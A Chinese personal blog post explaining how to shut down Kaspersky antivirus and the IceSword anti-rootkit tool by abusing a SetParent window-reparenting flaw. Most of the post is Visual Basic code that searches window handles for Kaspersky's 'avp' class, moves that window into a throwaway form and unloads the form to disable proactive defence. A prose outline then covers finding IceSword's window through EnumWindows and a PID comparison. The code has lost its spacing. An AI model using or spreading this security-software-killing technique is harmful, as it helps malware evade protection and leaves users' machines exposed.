突然发觉很长一段时间自己写的都是关于感情的(qq空间上),今就写篇技术类的作为本学期的最后一篇吧……今天的主题是:杀卡巴,干冰刃!我先说说原理:我们利用的是卡巴的setparent漏洞,结束掉卡巴(冰刃也有这个漏洞的),首先简单介绍下setparent漏洞:先给大家介绍个API函数:PrivateDeclareFunctionSetParentLibuser32(ByValhWndChildAsLong,ByValhWndNewParentAsLong)AsLong这里第一个参数hWndChild是源句柄,第二个参数hWndNewParent是目标句柄。函数setparent(hWndChild,hWndNewParent)就会把hWndChild指向的窗体放到hWndNewParent中。然后如果我们让目标窗体hWndNewParent关掉,那么源目标也就不复存在了……下面是代码,我给大家解释:OptionExplicitPrivateDeclareFunctionIsWindowLibuser32.dll(ByValhWndAsLong)AsLongPrivateDeclareFunctionSetParentLibuser32(ByValhWndChildAsLong,ByValhWndNewParentAsLong)AsLongPrivateDeclareFunctionGetClassNameLibuser32AliasGetClassNameA(ByValhWndAsLong,ByVallpClassNameAsString,ByValnMaxCountAsLong)AsLong'函数声明部分PrivateSubCommand1_Click()DimiAsSingleFori=1To4294967294#'用循环遍历hWndIfIsWindow(i)0Then'窗口可用DimstrAsStringstr=Space(255)CallGetClassName(i,str,255)'获得类名str=LCase(str)'转化为小写IfInStr(str,avp)0Then'是卡巴的窗口LoadForm2'这里的form2就是我们准备好的,那个目标窗体,给卡巴当棺材用的,呵呵调用SetParent漏洞攻击卡巴SetParenti,Form2.hWndUnloadForm2'卸载form2,卡巴的主动防御失效!ExitSubEndIf
EndIfDoEventsNextiEndSub下面我说说如何干掉冰刃,由于冰刃的句柄是一长串随机数,不想卡巴那么乖,是一个固定的。这就给我们找到冰刃的句柄带来了一定的困难。不过没关心,话说道高一尺,魔高一丈,呵呵呵,说的就是这个道理:
要定位冰刃的窗体,就要用到这个函数EnumWindows()函数原型是:PublicDeclareFunctionEnumWindowsLibuser32(ByValwndenmprcAsLong,ByVallParamAsLong)AsLong这个函数的功能是枚举系统所有的窗口然后要用到函数GetWindowThreadProcessId()这个函数可以获得某个句柄对应程序的PID。PID1
下面我们通过进程中名字为“iceword.exe”对应的PID2和PID1比较,如果相同,就说明我们前面获取的句柄是冰刃的句柄,同样很简单的用setparent漏洞就可以干掉冰刃了,HOHO~
我的QQ是417751561,有不明白的地方可以加我~~~~~ |
